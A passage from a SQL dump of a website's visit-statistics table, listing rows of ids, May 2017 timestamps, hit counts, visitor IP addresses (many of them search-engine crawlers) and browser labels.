0,'66.249.76.61',''),(113559,1495532538,1,0,1,0,'66.249.66.202',''),(113560,1495532840,1,1,0,0,'217.69.143.217','firefox'),(113561,1495533033,1,1,0,0,'51.255.65.90','other'),(113562,1495533072,1,1,0,0,'51.255.65.31','other'),(113563,1495533130,1,1,0,0,'157.55.39.135','other'),(113564,1495533176,1,1,0,0,'40.77.167.53','other'),(113565,1495533208,1,1,0,0,'109.236.81.168','chrome'),(113566,1495533319,1,1,0,0,'199.58.86.211','other'),(113567,1495533482,1,0,1,0,'68.180.230.48',''),(113568,1495533831,1,1,0,0,'51.255.71.133','other'),(113569,1495533900,1,1,0,0,'51.255.65.43','other'),(113570,1495534815,1,1,0,0,'164.132.161.63','other'),(113571,1495535009,1,1,0,0,'109.236.81.168','chrome'),(113572,1495535180,1,0,1,0,'66.249.66.182',''),(113573,1495535238,1,1,0,0,'217.182.132.33','other'),(113574,1495535391,1,1,0,0,'51.255.65.40','other'),(113575,1495535678,1,1,0,0,'92.113.6.65','chrome'),(113576,1495535859,2,0,2,0,'66.249.76.61',''),(113577,1495535865,1,0,1,0,'66.249.66.188',''),(113578,1495536067,1,1,0,0,'137.74.207.170','other'),(113579,1495536076,1,1,0,0,'217.182.132.81','other'),(113580,1495536158,1,0,1,0,'66.249.66.182',''),(113581,1495536169,1,0,1,0,'66.249.66.202',''),(113582,1495536296,1,1,0,0,'51.255.65.10','other'),(113583,1495536488,1,1,0,0,'141.8.142.15','other'),(113584,1495536564,1,1,0,0,'164.132.161.92','other'),(113585,1495536591,1,0,1,0,'66.249.76.157',''),(113586,1495536667,2,2,0,0,'40.77.167.95','other'),(113587,1495536710,1,1,0,0,'51.255.65.14','other'),(113588,1495536810,1,1,0,0,'109.236.81.168','chrome'),(113589,1495537030,1,0,1,0,'66.249.76.60',''),(113590,1495537067,1,1,0,0,'51.255.65.36','other'),(113591,1495537070,1,1,0,0,'164.132.161.85','other'),(113592,1495537623,1,1,0,0,'51.255.65.45','other'),(113593,1495537978,1,0,1,0,'66.249.66.210',''),(113594,1495538232,1,1,0,0,'137.74.207.102','other'),(113595,1495538286,1,0,1,0,'66.249.76.157',''),(113596,1495538609,1,1,0,0,'109.236.81.168','chrome'),(113597,1495538811,1,1,0,0,'91.196.178.66','firefox'),(113598,1495539360,2,2,0,0,'217.182.132.81','other'),(113599,1495539696,1,0,1,0,'66.249.76.137',''),(113600,1495539850,1,1,0,0,'91.196.178.39','chrome'),(113601,1495539972,3,3,0,0,'54.165.59.7','other'),(113602,1495540084,1,1,0,0,'137.74.207.161','other'),(113603,1495540120,1,1,0,0,'164.132.161.44','other'),(113604,1495540221,1,1,0,0,'188.166.87.191','firefox'),(113605,1495540408,1,1,0,0,'173.255.134.194','chrome'),(113606,1495540421,1,1,0,0,'164.132.161.28','other'),(113607,1495541214,1,0,1,0,'66.249.76.131',''),(113608,1495541415,1,1,0,0,'217.182.132.97','other'),(113609,1495541564,1,1,0,0,'217.182.132.79','other'),(113610,1495541772,1,0,1,0,'66.249.66.182',''),(113611,1495541805,1,0,1,0,'66.249.76.155',''),(113612,1495541809,1,0,1,0,'66.249.76.153',''),(113613,1495541954,1,1,0,0,'188.231.221.9','firefox'),(113614,1495542013,1,0,1,0,'66.249.66.202',''),(113615,1495542212,1,1,0,0,'109.236.81.168','chrome'),(113616,1495542286,3,3,0,0,'46.211.127.107','chrome'),(113617,1495542622,1,0,1,0,'66.249.76.47',''),(113618,1495543065,1,1,0,0,'8.29.198.26','other'),(113619,1495543192,1,1,0,0,'217.69.134.183','other'),(113620,1495543400,1,1,0,0,'164.132.161.33','other'),(113621,1495543980,1,1,0,0,'91.196.178.167','chrome'),(113622,1495543991,2,0,2,0,'66.249.76.157',''),(113623,1495543996,1,0,1,0,'66.249.76.62',''),(113624,1495544009,1,1,0,0,'109.236.81.168','chrome'),(113625,1495544012,1,0,1,0,'66.249.66.197',''),(113626,1495544464,1,1,0,0,'51.255.71.112','other'),(113627,1495544598,1,1,0,0,'91.196.176.13','chrome'),(113628,1495544868,1,0,1,0,'66.249.66.182',''),(113629,1495545451,1,1,0,0,'217.69.134.176','other'),(113630,1495545532,1,1,0,0,'51.255.65.12','other'),(113631,1495545809,1,1,0,0,'109.236.81.168','chrome'),(113632,1495545872,1,1,0,0,'91.196.178.68','chrome'),(113633,1495546066,1,1,0,0,'217.182.132.73','other'),(113634,1495546178,1,0,1,0,'66.249.76.62',''),(113635,1495546284,1,1,0,0,'51.255.65.37','other'),(113636,1495546288,1,1,0,0,'164.132.162.160','other'),(113637,1495546456,1,1,0,0,'51.255.65.7','other'),(113638,1495547125,1,1,0,0,'164.132.161.12','other'),(113639,1495547151,2,0,2,0,'66.249.76.157',''),(113640,1495547156,2,0,2,0,'66.249.76.155',''),(113641,1495547197,1,0,1,0,'68.180.230.48',''),(113642,1495547365,1,1,0,0,'51.255.65.3','other'),(113643,1495547456,1,1,0,0,'164.132.161.95','other'),(113644,1495547609,1,1,0,0,'109.236.81.168','chrome'),(113645,1495548059,1,1,0,0,'164.132.161.54','other'),(113646,1495548146,1,1,0,0,'54.165.59.7','other'),(113647,1495548234,1,1,0,0,'31.43.19.197','chrome'),(113648,1495548383,1,1,0,0,'51.255.65.2','other'),(113649,1495548427,1,1,0,0,'91.196.178.68','chrome'),(113650,1495548551,1,1,0,0,'51.255.65.31','other'),(113651,1495548589,1,1,0,0,'217.182.132.178','other'),(113652,1495548631,1,1,0,0,'213.160.156.50','firefox'),(113653,1495548807,1,1,0,0,'217.69.133.12','other'),(113654,1495549024,1,1,0,0,'217.69.133.217','other'),(113655,1495549102,1,0,1,0,'66.249.76.61',''),(113656,1495549214,1,1,0,0,'164.132.161.41','other'),(113657,1495549308,1,1,0,0,'164.132.161.45','other'),(113658,1495549403,1,1,0,0,'164.132.161.36','other'),(113659,1495550320,1,1,0,0,'157.55.39.248','other'),(113660,1495550625,1,1,0,0,'217.182.132.94','other'),(113661,1495550658,1,1,0,0,'51.255.65.94','other'),(113662,1495551040,1,1,0,0,'216.244.66.237','other'),(113663,1495551308,1,1,0,0,'217.182.132.62','other'),(113664,1495551430,1,0,1,0,'66.249.76.60',''),(113665,1495551442,1,1,0,0,'217.182.132.61','other'),(113666,1495551590,1,1,0,0,'164.132.161.60','other'),(113667,1495551751,1,0,1,0,'66.249.66.185',''),(113668,1495552228,1,1,0,0,'164.132.161.41','other'),(113669,1495552258,1,1,0,0,'51.255.65.63','other'),(113670,1495552385,1,1,0,0,'217.182.132.77','other'),(113671,1495552632,1,1,0,0,'137.74.201.108','other'),(113672,1495552858,2,2,0,0,'164.132.161.35','other'),(113673,1495553054,1,0,1,0,'66.249.76.60',''),(113674,1495553158,1,1,0,0,'217.69.135.93','other'),(113675,1495553897,1,1,0,0,'8.29.198.25','other'),(113676,1495554078,1,1,0,0,'217.69.135.202','other'),(113677,1495554133,1,1,0,0,'217.69.135.205','other'),(113678,1495554229,1,1,0,0,'51.255.65.13','other'),(113679,1495554396,1,0,1,0,'66.249.66.188',''),(113680,1495554402,1,0,1,0,'66.249.76.153',''),(113681,1495555425,1,0,1,0,'66.249.66.202',''),(113682,1495555427,1,1,0,0,'164.132.161.64','other'),(113683,1495556042,1,1,0,0,'66.249.76.61','chrome'),(113684,1495556165,1,1,0,0,'51.255.64.106','other'),(113685,1495556389,1,0,1,0,'66.249.66.185',''),(113686,1495556395,1,0,1,0,'66.249.66.202',''),(113687,1495556583,1,1,0,0,'54.165.59.7','other'),(113688,1495556716,1,0,1,0,'66.249.66.188',''),(113689,1495557043,2,2,0,0,'212.26.140.63','firefox'),(113690,1495557473,1,1,0,0,'217.182.132.77','other'),(113691,1495557923,1,1,0,0,'54.165.59.7','other'),(113692,1495558005,1,1,0,0,'217.182.132.70','other'),(113693,1495558156,1,0,1,0,'66.249.76.155',''),(113694,1495558159,1,0,1,0,'66.249.66.185',''),(113695,1495558163,1,0,1,0,'66.249.66.182',''),(113696,1495558617,1,1,0,0,'217.182.132.90','other'),(113697,1495559217,1,1,0,0,'51.255.71.119','other'),(113698,1495559375,1,1,0,0,'164.132.161.2','other'),(113699,1495559562,1,1,0,0,'157.55.39.135','other'),(113700,1495559613,1,1,0,0,'66.249.66.185','chrome'),(113701,1495559894,1,1,0,0,'91.196.178.34','chrome'),(113702,1495559994,1,1,0,0,'164.132.161.64','other'),(113703,1495560168,1,1,0,0,'217.182.132.63','other'),(113704,1495560336,1,1,0,0,'217.69.133.14','other'),(113705,1495560375,1,1,0,0,'157.55.39.248','other'),(113706,1495560561,1,1,0,0,'51.255.71.129','other'),(113707,1495561303,1,1,0,0,'217.182.132.21','other'),(113708,1495561502,1,1,0,0,'157.55.39.152','other'),(113709,1495561597,1,1,0,0,'217.182.132.23','other'),(113710,1495561719,1,0,1,0,'66.249.76.60',''),(113711,1495562297,1,1,0,0,'51.255.65.7','other'),(113712,1495562386,1,1,0,0,'164.132.161.56','other'),(113713,1495562601,1,1,0,0,'137.74.201.99','other'),(113714,1495562941,1,1,0,0,'51.255.65.5','other'),(113715,1495562978,1,1,0,0,'217.182.132.149','other'),(113716,1495563075,1,1,0,0,'188.166.91.5','firefox'),(113717,1495563301,1,1,0,0,'51.255.65.33','other'),(113718,1495563394,1,1,0,0,'217.69.133.67','other'),(113719,1495563429,1,1,0,0,'217.182.132.24','other'),(113720,1495563683,1,1,0,0,'51.255.65.15','other'),(113721,1495563709,1,1,0,0,'178.62.128.67','firefox'),(113722,1495563722,1,1,0,0,'164.132.162.154','other'),(113723,1495564113,1,0,1,0,'66.249.76.45',''),(113724,1495564209,1,1,0,0,'157.55.39.152','other'),(113725,1495564216,1,1,0,0,'66.249.66.210','chrome'),(113726,1495564460,1,1,0,0,'217.182.132.178','other'),(113727,1495564464,1,1,0,0,'199.58.86.209','other'),(113728,1495564505,1,1,0,0,'51.255.71.122','other'),(113729,1495564727,1,1,0,0,'8.29.198.26','other'),(113730,1495564954,2,0,2,0,'66.249.76.155',''),(113731,1495565198,1,0,1,0,'66.249.66.182',''),(113732,1495565275,1,1,0,0,'157.55.39.152','other'),(113733,1495565551,1,0,1,0,'66.249.76.153',''),(113734,1495565571,1,0,1,0,'66.249.76.46',''),(113735,1495565577,2,0,2,0,'66.249.76.45',''),(113736,1495565699,1,0,1,0,'66.249.76.131',''),(113737,1495565782,1,0,1,0,'66.249.66.210',''),(113738,1495566048,1,1,0,0,'217.182.132.77','other'),(113739,1495566284,1,1,0,0,'91.196.178.166','chrome'),(113740,1495566342,1,1,0,0,'51.255.65.65','other'),(113741,1495566344,1,1,0,0,'46.211.69.182','chrome'),(113742,1495566540,1,0,1,0,'66.249.76.46',''),(113743,1495566977,1,1,0,0,'217.182.132.184','other'),(113744,1495566978,1,1,0,0,'176.8.141.224','chrome'),(113745,1495567238,1,1,0,0,'164.132.161.91','other'),(113746,1495567390,1,1,0,0,'66.249.76.62','chrome'),(113747,1495567516,1,1,0,0,'51.255.65.68','other'),(113748,1495567858,1,0,1,0,'66.249.76.135',''),(113749,1495567910,1,1,0,0,'173.234.159.250','other'),(113750,1495568527,1,1,0,0,'66.249.66.210','chrome'),(113751,1495568764,1,0,1,0,'66.249.66.185',''),(113752,1495568831,1,1,0,0,'193.194.127.217','firefox'),(113753,1495568839,1,1,0,0,'217.182.132.36','other'),(113754,1495568879,1,0,1,0,'66.249.66.182',''),(113755,1495568969,1,1,0,0,'66.249.76.109','chrome'),(113756,1495569026,1,1,0,0,'164.132.161.34','other'),(113757,1495569203,1,1,0,0,'157.55.39.135','other'),(113758,1495569368,1,0,1,0,'66.249.76.107',''),(113759,1495569474,1,1,0,0,'91.196.178.66','chrome'),(113760,1495570253,1,1,0,0,'217.182.132.146','other'),(113761,1495570292,1,0,1,0,'66.249.76.93',''),(113762,1495570762,1,1,0,0,'51.255.65.27','other'),(113763,1495570850,1,0,1,0,'66.249.66.183',''),(113764,1495571182,1,1,0,0,'217.182.132.152','other'),(113765,1495571648,1,1,0,0,'164.132.161.26','other'),(113766,1495572033,1,1,0,0,'51.255.65.15','other'),(113767,1495572430,1,1,0,0,'217.69.133.193','other'),(113768,1495572469,1,1,0,0,'217.182.132.154','other'),(113769,1495572580,2,0,2,0,'66.249.76.89',''),(113770,1495572617,1,0,1,0,'66.249.66.84',''),(113771,1495572836,1,1,0,0,'164.132.162.164','other'),(113772,1495573136,1,0,1,0,'66.249.76.93',''),(113773,1495573186,1,0,1,0,'66.249.76.91',''),(113774,1495573502,1,1,0,0,'217.182.132.52','other'),(113775,1495573617,1,1,0,0,'164.132.161.11','other'),(113776,1495573761,1,1,0,0,'51.255.65.78','other'),(113777,1495574027,1,1,0,0,'164.132.161.95','other'),(113778,1495574306,1,1,0,0,'217.182.132.175','other'),(113779,1495574331,1,1,0,0,'51.255.65.29','other'),(113780,1495574769,1,1,0,0,'164.132.161.56','other'),(113781,1495574774,1,1,0,0,'180.76.15.141','other'),(113782,1495575166,1,1,0,0,'164.132.161.80','other'),(113783,1495575231,1,0,1,0,'66.249.76.108',''),(113784,1495575253,1,1,0,0,'66.249.76.93','chrome'),(113785,1495575555,1,1,0,0,'8.29.198.25','other'),(113786,1495575572,1,1,0,0,'95.108.213.34','other'),(113787,1495575719,1,1,0,0,'217.182.132.30','other'),(113788,1495575862,1,0,1,0,'66.249.76.109',''),(113789,1495576016,1,1,0,0,'137.74.203.194','other'),(113790,1495576096,1,1,0,0,'137.74.207.116','other'),(113791,1495576512,1,0,1,0,'66.249.66.183',''),(113792,1495576523,2,0,2,0,'66.249.66.180',''),(113793,1495576540,1,0,1,0,'66.249.76.93',''),(113794,1495577033,1,1,0,0,'188.166.25.25','firefox'),(113795,1495577337,1,1,0,0,'51.255.65.42','other'),(113796,1495577847,2,0,2,0,'66.249.76.91',''),(113797,1495577858,1,0,1,0,'66.249.76.89',''),(113798,1495579376,1,1,0,0,'217.182.132.28','other'),(113799,1495579558,1,1,0,0,'164.132.161.12','other'),(113800,1495579711,1,1,0,0,'164.132.162.188','other'),(113801,1495579996,1,0,1,0,'66.249.66.177',''),(113802,1495580282,1,1,0,0,'51.255.71.133','other'),(113803,1495580953,1,0,1,0,'66.249.76.109',''),(113804,1495581100,1,1,0,0,'164.132.161.52','other'),(113805,1495581148,1,1,0,0,'51.255.65.60','other'),(113806,1495581363,1,1,0,0,'51.255.65.2','other'),(113807,1495581470,1,1,0,0,'164.132.161.33','other'),(113808,1495582414,2,0,2,0,'66.249.76.93',''),(113809,1495582508,1,0,1,0,'66.249.76.89',''),(113810,1495582712,1,1,0,0,'217.69.133.10','other'),(113811,1495583513,1,1,0,0,'164.132.161.3','other'),(113812,1495583968,1,1,0,0,'164.132.162.159','other'),(113813,1495584750,2,1,1,0,'66.249.76.109',''),(113814,1495585146,1,1,0,0,'164.132.161.77','other'),(113815,1495585293,1,1,0,0,'164.132.161.8','other'),(113816,1495585439,1,0,1,0,'66.249.66.183',''),(113817,1495585469,1,1,0,0,'217.182.132.84','other'),(113818,1495585680,1,0,1,0,'68.180.230.48',''),(113819,1495586129,1,1,0,0,'51.255.65.97','other'),(113820,1495586322,1,1,0,0,'51.255.65.3','other'),(113821,1495586392,1,1,0,0,'8.29.198.25','other'),(113822,1495586693,1,1,0,0,'66.249.76.93','chrome'),(113823,1495586699,1,1,0,0,'217.182.132.173','other'),(113824,1495587026,1,1,0,0,'157.55.39.248','other'),(113825,1495587535,1,1,0,0,'217.182.132.186','other'),(113826,1495587660,1,1,0,0,'137.74.207.188','other'),(113827,1495587676,1,1,0,0,'164.132.161.14','other'),(113828,1495588222,1,1,0,0,'95.108.213.34','other'),(113829,1495588934,1,1,0,0,'164.132.161.38','other'),(113830,1495589182,1,1,0,0,'95.108.179.15','other'),(113831,1495589430,1,1,0,0,'51.255.65.32','other'),(113832,1495589669,1,1,0,0,'164.132.161.23','other'),(113833,1495589967,1,1,0,0,'164.132.161.80','other'),(113834,1495590002,1,0,1,0,'66.249.76.93',''),(113835,1495590007,1,0,1,0,'66.249.76.91',''),(113836,1495590013,3,0,3,0,'66.249.76.89',''),(113837,1495590184,1,1,0,0,'51.255.65.17','other'),(113838,1495590309,1,1,0,0,'164.132.161.81','other'),(113839,1495590352,1,1,0,0,'51.255.65.21','other'),(113840,1495590800,1,1,0,0,'157.55.39.152','other'),(113841,1495590856,1,1,0,0,'164.132.161.97','other'),(113842,1495591401,1,1,0,0,'180.76.15.138','other'),(113843,1495591603,1,1,0,0,'180.76.15.25','other'),(113844,1495591817,1,1,0,0,'51.255.65.86','other'),(113845,1495592288,1,0,1,0,'68.180.230.48',''),(113846,1495592438,1,1,0,0,'217.182.132.28','other'),(113847,1495592928,1,1,0,0,'164.132.161.97','other'),(113848,1495593404,1,0,1,0,'66.249.76.93',''),(113849,1495593566,1,1,0,0,'51.255.65.87','other'),(113850,1495593846,1,0,1,0,'66.249.76.109',''),(113851,1495593852,1,0,1,0,'66.249.66.177',''),(113852,1495594373,1,1,0,0,'217.182.132.79','other'),(113853,1495594787,1,0,1,0,'66.249.66.84',''),(113854,1495595034,1,1,0,0,'157.55.39.152','other'),(113855,1495595216,1,1,0,0,'217.182.132.29','other'),(113856,1495595447,1,1,0,0,'51.255.65.18','other'),(113857,1495595498,1,0,1,0,'66.249.76.109',''),(113858,1495596313,1,1,0,0,'51.255.65.52','other'),(113859,1495597133,1,1,0,0,'217.182.132.193','other'),(113860,1495597216,1,1,0,0,'8.29.198.26','other'),(113861,1495597261,1,1,0,0,'164.132.161.79','other'),(113862,1495597544,1,1,0,0,'51.255.71.119','other'),(113863,1495597607,1,1,0,0,'157.55.39.152','other'),(113864,1495597731,1,1,0,0,'51.255.71.116','other'),(113865,1495597745,1,1,0,0,'217.182.132.74','other'),(113866,1495597947,1,1,0,0,'164.132.161.95','other'),(113867,1495598386,1,1,0,0,'164.132.161.37','other'),(113868,1495598406,1,1,0,0,'164.132.161.70','other'),(113869,1495598642,1,1,0,0,'217.182.132.191','other'),(113870,1495599395,1,1,0,0,'164.132.161.88','other'),(113871,1495599492,1,1,0,0,'51.255.71.133','other'),(113872,1495599765,1,0,1,0,'66.249.76.107',''),(113873,1495600429,1,1,0,0,'51.255.65.14','other'),(113874,1495601113,1,1,0,0,'51.255.71.131','other'),(113875,1495601144,1,0,1,0,'66.249.76.93',''),(113876,1495601496,1,0,1,0,'66.249.76.89',''),(113877,1495601764,2,2,0,0,'91.196.178.71','firefox'),(113878,1495601818,1,1,0,0,'164.132.161.68','other'),(113879,1495603000,2,1,1,0,'66.249.76.109',''),(113880,1495603113,1,1,0,0,'137.74.201.99','other'),(113881,1495603118,1,0,1,0,'66.249.66.81',''),(113882,1495603135,1,0,1,0,'66.249.76.89',''),(113883,1495603141,1,0,1,0,'66.249.76.93',''),(113884,1495603153,1,0,1,0,'66.249.76.91',''),(113885,1495603234,1,1,0,0,'157.55.39.248','other'),(113886,1495603589,1,1,0,0,'164.132.161.10','other'),(113887,1495603825,1,1,0,0,'91.196.178.68','chrome'),(113888,1495604097,1,1,0,0,'51.255.65.27','other'),(113889,1495604244,1,1,0,0,'164.132.161.22','other'),(113890,1495604361,1,1,0,0,'66.249.76.109','chrome'),(113891,1495604593,2,2,0,0,'37.54.18.21','chrome'),(113892,1495604830,1,1,0,0,'66.249.76.93','chrome'),(113893,1495605136,1,1,0,0,'51.255.65.19','other'),(113894,1495605499,1,1,0,0,'164.132.161.41','other'),(113895,1495605511,1,1,0,0,'51.255.173.7','other'),(113896,1495605776,1,1,0,0,'164.132.161.90','other'),(113897,1495605798,1,1,0,0,'51.255.65.45','other'),(113898,1495605938,2,2,0,0,'157.55.39.248','other'),(113899,1495606064,1,1,0,0,'217.182.132.175','other'),(113900,1495606065,1,1,0,0,'217.69.133.10','other'),(113901,1495606140,1,0,1,0,'66.249.66.87',''),(113902,1495606151,1,1,0,0,'51.255.71.100','other'),(113903,1495606159,1,1,0,0,'217.69.133.193','other'),(113904,1495606182,1,1,0,0,'217.182.132.73','other'),(113905,1495606429,1,1,0,0,'66.102.9.27','chrome'),(113906,1495606476,1,1,0,0,'195.10.210.49','chrome'),(113907,1495606504,1,0,1,0,'66.249.76.91',''),(113908,1495606539,1,0,1,0,'66.249.76.108',''),(113909,1495606545,1,0,1,0,'66.249.76.107',''),(113910,1495606576,1,0,1,0,'66.249.66.81',''),(113911,1495606793,1,1,0,0,'217.182.132.186','other'),(113912,1495606862,1,1,0,0,'217.182.132.157','other'),(113913,1495607068,1,1,0,0,'164.132.161.5','other'),(113914,1495607180,1,0,1,0,'66.249.76.93',''),(113915,1495607242,1,1,0,0,'217.182.132.59','other'),(113916,1495607602,1,1,0,0,'31.43.19.197','chrome'),(113917,1495607737,1,1,0,0,'137.74.207.114','other'),(113918,1495607937,1,1,0,0,'51.255.65.30','other'),(113919,1495608049,1,1,0,0,'8.29.198.25','other'),(113920,1495608155,1,1,0,0,'164.132.161.22','other'),(113921,1495608379,2,0,2,0,'66.249.76.93',''),(113922,1495608385,2,0,2,0,'66.249.66.84',''),(113923,1495608463,2,2,0,0,'157.55.39.135','other'),(113924,1495608536,1,1,0,0,'164.132.161.4','other'),(113925,1495608561,1,1,0,0,'217.182.132.174','other'),(113926,1495608569,2,2,0,0,'162.210.196.130','other'),(113927,1495608615,1,1,0,0,'66.249.76.89','chrome'),(113928,1495609004,1,1,0,0,'157.55.39.152','other'),(113929,1495609105,1,1,0,0,'51.255.65.76','other'),(113930,1495609178,1,1,0,0,'164.132.161.68','other'),(113931,1495609224,1,1,0,0,'164.132.161.64','other'),(113932,1495609475,1,1,0,0,'217.182.132.50','other'),(113933,1495609681,1,1,0,0,'82.207.29.11','chrome'),(113934,1495610161,1,1,0,0,'217.182.132.191','other'),(113935,1495610188,1,1,0,0,'66.249.66.84','chrome'),(113936,1495610200,1,0,1,0,'66.249.76.91',''),(113937,1495610331,1,1,0,0,'91.196.177.15','chrome'),(113938,1495610417,2,1,1,0,'66.249.76.108',''),(113939,1495610559,1,1,0,0,'51.255.71.128','other'),(113940,1495610804,2,0,2,0,'66.249.76.107',''),(113941,1495610826,1,1,0,0,'164.132.161.64','other'),(113942,1495611046,1,1,0,0,'91.196.178.135','firefox'),(113943,1495611115,1,1,0,0,'91.196.178.72','firefox'),(113944,1495611170,1,1,0,0,'51.255.65.37','other'),(113945,1495611302,1,1,0,0,'217.182.132.29','other'),(113946,1495611405,1,1,0,0,'217.182.132.59','other'),(113947,1495611822,1,1,0,0,'164.132.162.158','other'),(113948,1495611931,1,0,1,0,'66.249.66.180',''),(113949,1495612118,1,1,0,0,'91.196.178.72','firefox'),(113950,1495612237,1,1,0,0,'180.76.15.139','other'),(113951,1495613068,1,1,0,0,'51.255.71.110','other'),(113952,1495613082,1,1,0,0,'40.77.167.95','other'),(113953,1495613115,1,1,0,0,'217.182.132.30','other'),(113954,1495613315,1,0,1,0,'66.249.76.109',''),(113955,1495613603,1,0,1,0,'66.249.76.89',''),(113956,1495613610,2,0,2,0,'66.249.66.81',''),(113957,1495613753,1,0,1,0,'66.249.76.91',''),(113958,1495614417,1,1,0,0,'91.196.178.165','chrome'),(113959,1495614434,1,0,1,0,'66.249.66.177',''),(113960,1495614500,1,1,0,0,'157.55.39.152','other'),(113961,1495614564,1,1,0,0,'5.255.253.63','other'),(113962,1495614565,1,1,0,0,'141.8.142.164','other'),(113963,1495614988,1,1,0,0,'164.132.161.34','other'),(113964,1495615034,1,1,0,0,'217.182.132.72','other'),(113965,1495615035,1,1,0,0,'164.132.161.48','other'),(113966,1495615192,1,1,0,0,'51.255.65.48','other'),(113967,1495615253,1,0,1,0,'66.249.76.108',''),(113968,1495615257,1,0,1,0,'66.249.66.87',''),(113969,1495615301,1,1,0,0,'51.255.65.224','other'),(113970,1495615547,1,1,0,0,'217.182.132.154','other'),(113971,1495615549,1,1,0,0,'178.95.148.154','chrome'),(113972,1495615893,1,1,0,0,'164.132.161.81','other'),(113973,1495615955,1,1,0,0,'91.196.178.132','chrome'),(113974,1495616378,1,1,0,0,'51.255.65.79','other'),(113975,1495616481,1,1,0,0,'51.255.65.44','other'),(113976,1495616591,1,1,0,0,'137.74.207.119','other'),(113977,1495617014,1,1,0,0,'91.204.84.52','chrome'),(113978,1495617191,2,0,2,0,'66.249.76.91',''),(113979,1495617192,1,0,1,0,'66.249.76.109',''),(113980,1495617378,1,0,1,0,'66.249.76.93',''),(113981,1495617478,1,0,1,0,'66.249.66.177',''),(113982,1495617825,1,1,0,0,'164.132.161.23','other'),(113983,1495617892,1,1,0,0,'217.182.132.81','other'),(113984,1495617958,1,1,0,0,'51.255.65.83','other'),(113985,1495618049,1,1,0,0,'217.182.132.73','other'),(113986,1495618188,1,1,0,0,'37.53.224.9','firefox'),(113987,1495618574,1,0,1,0,'66.249.66.84',''),(113988,1495618584,1,0,1,0,'66.249.66.81',''),(113989,1495618737,2,2,0,0,'95.132.134.226','chrome'),(113990,1495618779,2,2,0,0,'157.55.39.135','other'),(113991,1495618835,1,1,0,0,'51.255.71.132','other'),(113992,1495618884,1,1,0,0,'8.29.198.26','other'),(113993,1495618928,1,1,0,0,'77.52.177.114','firefox'),(113994,1495619202,1,1,0,0,'217.182.132.187','other'),(113995,1495619291,1,1,0,0,'51.255.65.33','other'),(113996,1495619293,1,0,1,0,'66.249.76.109',''),(113997,1495619363,1,1,0,0,'51.255.65.27','other'),(113998,1495619830,1,1,0,0,'137.74.207.119','other'),(113999,1495619957,1,1,0,0,'217.182.132.62','other'),(114000,1495620221,1,1,0,0,'157.55.39.152','other'),(114001,1495620411,1,1,0,0,'164.132.161.88','other'),(114002,1495620550,1,0,1,0,'66.249.76.109',''),(114003,1495620558,1,0,1,0,'66.249.76.108',''),(114004,1495620564,1,0,1,0,'66.249.66.87',''),(114005,1495620764,1,1,0,0,'66.249.66.87','chrome'),(114006,1495620913,1,1,0,0,'66.249.66.180','chrome'),(114007,1495621883,1,1,0,0,'66.249.66.177','chrome'),(114008,1495622077,1,0,1,0,'66.249.76.89',''),(114009,1495622569,1,1,0,0,'164.132.162.159','other'),(114010,1495623005,1,1,0,0,'164.132.161.65','other'),(114011,1495623026,2,1,1,0,'66.249.66.84',''),(114012,1495623090,1,1,0,0,'178.92.29.110','chrome'),(114013,1495623474,1,1,0,0,'137.74.207.109','other'),(114014,1495623700,1,1,0,0,'188.32.237.205','chrome'),(114015,1495623893,2,2,0,0,'51.255.173.36','other'),(114016,1495624496,1,1,0,0,'164.132.161.19','other'),(114017,1495624647,1,1,0,0,'164.132.161.27','other'),(114018,1495624962,1,1,0,0,'91.196.178.129','chrome'),(114019,1495625157,1,1,0,0,'51.255.65.20','other'),(114020,1495625402,1,1,0,0,'51.255.65.96','other'),(114021,1495625487,1,0,1,0,'66.249.76.91',''),(114022,1495625538,1,0,1,0,'66.249.76.109',''),(114023,1495625697,1,1,0,0,'91.196.178.71','chrome'),(114024,1495625708,1,1,0,0,'217.182.132.14','other'),(114025,1495626213,1,1,0,0,'164.132.162.159','other'),(114026,1495626590,3,0,3,0,'66.249.76.91',''),(114027,1495626695,1,1,0,0,'77.52.177.114','firefox'),(114028,1495626883,1,1,0,0,'51.255.71.98','other'),(114029,1495626911,1,1,0,0,'164.132.162.157','other'),(114030,1495627299,1,1,0,0,'164.132.161.30','other'),(114031,1495627497,1,1,0,0,'217.182.132.76','other'),(114032,1495627572,1,1,0,0,'217.182.132.181','other'),(114033,1495627829,1,0,1,0,'66.249.76.93',''),(114034,1495628041,1,0,1,0,'66.249.76.91',''),(114035,1495628218,1,1,0,0,'164.132.162.154','other'),(114036,1495628316,1,1,0,0,'217.69.133.169','firefox'),(114037,1495628357,1,1,0,0,'164.132.161.51','other'),(114038,1495628400,1,1,0,0,'217.182.132.94','other'),(114039,1495628638,1,1,0,0,'82.145.222.119','chrome'),(114040,1495628699,1,1,0,0,'51.255.71.110','other'),(114041,1495629029,1,1,0,0,'51.255.71.130','other'),(114042,1495629186,1,1,0,0,'164.132.161.54','other'),(114043,1495629211,1,1,0,0,'5.254.65.188','firefox'),(114044,1495629258,1,1,0,0,'188.166.91.5','firefox'),(114045,1495629722,1,1,0,0,'8.29.198.27','other'),(114046,1495629723,1,1,0,0,'217.69.133.231','other'),(114047,1495629792,1,1,0,0,'51.255.65.18','other'),(114048,1495630077,1,1,0,0,'164.132.161.40','other'),(114049,1495630784,1,1,0,0,'51.255.71.121','other'),(114050,1495631383,1,1,0,0,'217.182.132.6','other'),(114051,1495631590,2,2,0,0,'82.207.113.129','chrome'),(114052,1495632136,1,0,1,0,'66.249.76.109',''),(114053,1495632258,1,1,0,0,'164.132.162.158','other'),(114054,1495632316,1,1,0,0,'95.132.56.183','firefox'),(114055,1495632322,1,0,1,0,'66.249.76.108',''),(114056,1495632453,1,1,0,0,'51.255.65.82','other'),(114057,1495632573,1,1,0,0,'217.182.132.27','other'),(114058,1495633150,1,1,0,0,'217.182.132.92','other'),(114059,1495633229,1,0,1,0,'66.249.66.84',''),(114060,1495633334,1,1,0,0,'137.74.207.108','other'),(114061,1495633457,1,1,0,0,'164.132.161.29','other'),(114062,1495633459,1,1,0,0,'95.135.59.81','chrome'),(114063,1495633476,1,1,0,0,'91.196.178.71','firefox'),(114064,1495633639,1,1,0,0,'158.69.225.37','other'),(114065,1495633663,1,1,0,0,'158.69.225.37','chrome'),(114066,1495633863,1,1,0,0,'40.77.167.95','other'),(114067,1495634084,1,1,0,0,'91.196.178.135','firefox'),(114068,1495634730,1,1,0,0,'82.207.91.234','firefox'),(114069,1495634807,1,1,0,0,'157.55.39.248','other'),(114070,1495634924,1,0,1,0,'66.249.76.93',''),(114071,1495635031,1,1,0,0,'138.68.102.176','other'),(114072,1495635150,1,1,0,0,'178.150.140.223','chrome'),(114073,1495635276,1,1,0,0,'51.255.71.129','other'),(114074,1495635321,1,1,0,0,'